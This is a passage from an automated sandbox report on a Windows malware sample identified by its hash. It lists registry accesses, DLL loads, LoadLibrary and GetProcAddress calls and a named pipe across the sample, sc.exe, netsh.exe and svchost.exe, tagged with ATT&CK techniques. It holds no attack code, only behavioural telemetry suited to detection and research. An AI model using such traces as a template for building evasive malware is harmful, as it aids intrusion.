\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 749A0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74560000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00003900)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"KERNEL32.DLL\" at base 75240000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"WS2_32.DLL\" at base 76130000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"DBGHELP.DLL\" at base 6f370000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"USER32.DLL\" at base 769b0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"ADVAPI32.DLL\" at base 76ed0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"SHELL32.DLL\" at base 75320000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"OLEAUT32.DLL\" at base 76bb0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"MSVCR100.DLL\" at base 69d90000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"NTDLL.DLL\" at base 76f80000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"OLE32.DLL\" at base 75fb0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"CRYPTBASE.DLL\" at base 74d80000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73d10000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"PROPSYS.DLL\" at base 739d0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"COMCTL32.DLL\" at base 73d80000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"APPHELP.DLL\" at base 74d30000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"CLBCATQ.DLL\" at base 76cf0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a1c0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75240000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"SETUPAPI.DLL\" at base 76810000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"RPCRT4.DLL\" at base 764b0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 739d0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"NTMARTA.DLL\" at base 742f0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76110000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"PROFAPI.DLL\" at base 74ea0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 751b0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76d80000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"SECUR32.DLL\" at base 74bb0000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75000000\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74d30000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70240000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 75240000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 77170000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 770d0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70240000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 75240000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 71b40000\n \"sc.exe\" loaded module \"RPCRT4.DLL\" at base 764b0000\n \"egzkrznd.exe\" loaded module \"KERNEL32.DLL\" at base 75240000\n \"egzkrznd.exe\" loaded module \"WS2_32.DLL\" at base 76130000\n \"egzkrznd.exe\" loaded module \"DBGHELP.DLL\" at base 6f370000\n \"egzkrznd.exe\" loaded module \"USER32.DLL\" at base 769b0000\n \"egzkrznd.exe\" loaded module \"ADVAPI32.DLL\" at base 76ed0000\n \"egzkrznd.exe\" loaded module \"SHELL32.DLL\" at base 75320000\n \"egzkrznd.exe\" loaded module \"OLEAUT32.DLL\" at base 76bb0000\n \"egzkrznd.exe\" loaded module \"MSVCR100.DLL\" at base 69be0000\n \"egzkrznd.exe\" loaded module \"SSPICLI.DLL\" at base 74d10000\n \"egzkrznd.exe\" loaded module \"RPCRT4.DLL\" at base 764b0000\n \"egzkrznd.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76110000\n \"egzkrznd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74d30000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 71bb0000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6b470000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 75240000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6b090000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6c780000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 69ad0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75240000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 69ee0000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 69eb0000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 69ea0000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 69ac0000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 69ab0000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 69a90000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 69580000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 68110000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 764b0000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 67ff0000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 69a80000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 69c70000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 69c00000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 69410000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 64950000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 75fb0000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 74d80000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73d10000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74890000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 769b0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 76cf0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6b790000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 76ed0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 76110000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 76110000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 76110000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76110000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74620000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74e20000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6fb60000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 74f30000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74460000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74560000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 76bb0000\n \"svchost.exe\" loaded module \"NTDLL.DLL\" at base 76f80000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 731e0000\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 73070000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 764b0000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 730f0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73510000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 72d10000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76110000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 72cf0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74850000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74710000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 72ce0000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 76130000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73150000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 71540000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 74d10000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76110000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 743b0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005872)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004004)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004004)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004004)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004004)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00006044)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00006044)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006044)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006044)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006044)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006044)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004236)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004236)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004236)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004236)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004236)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004236)\n \"egzkrznd.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00001396)\n \"egzkrznd.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00001396)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003360)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003360)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00003900)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00003900)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00003900)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003900)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003900)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003900)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005872)\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" called \"GetProcAddress\" with a parameter CloseHandle 